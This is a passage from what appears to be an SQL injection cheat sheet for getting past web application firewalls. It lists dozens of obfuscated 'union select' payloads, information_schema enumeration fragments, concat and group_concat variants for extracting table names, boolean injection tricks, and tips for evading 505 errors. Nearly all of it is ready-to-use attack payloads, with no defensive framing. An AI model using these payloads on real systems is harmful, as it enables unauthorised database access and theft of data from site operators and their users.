  680. /*!u%6eion*/ /*!se%6cect*/
  681. uni%20union%20/*!select*/%20
  682. union%23aa%0Aselect
  683. /**/union/*!50000select*/
  684. /^.*union.*$/ /^.*select.*$/
  685. /*union*/union/*select*/select+
  686. /*uni X on*/union/*sel X ect*/
  687. +un/**/ion+sel/**/ect+
  688. +UnIOn%0d%0aSeleCt%0d%0a
  689. UNION/*&test=1*/SELECT/*&pwn=2*/
  690. un?+un/**/ion+se/**/lect+
  691. +UNunionION+SEselectLECT+
  692. +uni%0bon+se%0blect+
  693. %252f%252a*/union%252f%252a /select%252f%252a*/
  694. /%2A%2A/union/%2A%2A/select/%2A%2A/
  695. %2f**%2funion%2f**%2fselect%2f**%2f
  696. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  697. /*!UnIoN*/SeLecT+
  698.  
  699. [~] information_schema.tables [~]
  700. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  701. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  702. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  703. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  704. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  705. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  706.  
  707. [~] concat() [~]
  708. CoNcAt()
  709. concat()
  710. CON%08CAT()
  711. CoNcAt()
  712. %0AcOnCat()
  713. /**//*!12345cOnCat*/
  714. /*!50000cOnCat*/(/*!*/)
  715. unhex(hex(concat(table_name)))
  716. unhex(hex(/*!12345concat*/(table_name)))
  717. unhex(hex(/*!50000concat*/(table_name)))
  718.  
  719. [~] group_concat() [~]
  720. /*!group_concat*/()
  721. gRoUp_cOnCAt()
  722. group_concat(/*!*/)
  723. group_concat(/*!12345table_name*/)
  724. group_concat(/*!50000table_name*/)
  725. /*!group_concat*/(/*!12345table_name*/)
  726. /*!group_concat*/(/*!50000table_name*/)
  727. /*!12345group_concat*/(/*!12345table_name*/)
  728. /*!50000group_concat*/(/*!50000table_name*/)
  729. /*!GrOuP_ConCaT*/()
  730. /*!12345GroUP_ConCat*/()
  731. /*!50000gRouP_cOnCaT*/()
  732. /*!50000Gr%6fuP_c%6fnCAT*/()
  733. unhex(hex(group_concat(table_name)))
  734. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  735. unhex(hex(/*!12345group_concat*/(table_name)))
  736. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  737. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  738. unhex(hex(/*!50000group_concat*/(table_name)))
  739. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  740. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  741. convert(group_concat(table_name)+using+ascii)
  742. convert(group_concat(/*!table_name*/)+using+ascii)
  743. convert(group_concat(/*!12345table_name*/)+using+ascii)
  744. convert(group_concat(/*!50000table_name*/)+using+ascii)
  745. CONVERT(group_concat(table_name)+USING+latin1)
  746. CONVERT(group_concat(table_name)+USING+latin2)
  747. CONVERT(group_concat(table_name)+USING+latin3)
  748. CONVERT(group_concat(table_name)+USING+latin4)
  749. CONVERT(group_concat(table_name)+USING+latin5)
  750.  
  751. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  752. +div+0
  753. Having+1=0
  754. +AND+1=0
  755. +/*!and*/+1=0
  756. and(1)=(0)
  757. when the --+- or -- doesn't work, use ;%00
  758.  
  759.  
  760.  
  761. bypass error 505
  762. sometimes when using union select, sites return 505 or time out....
  763. bypass-
  764. -use brackets
  765. union(select+1)
  766. -use %0b or /**/ as space
  767. union%0bselect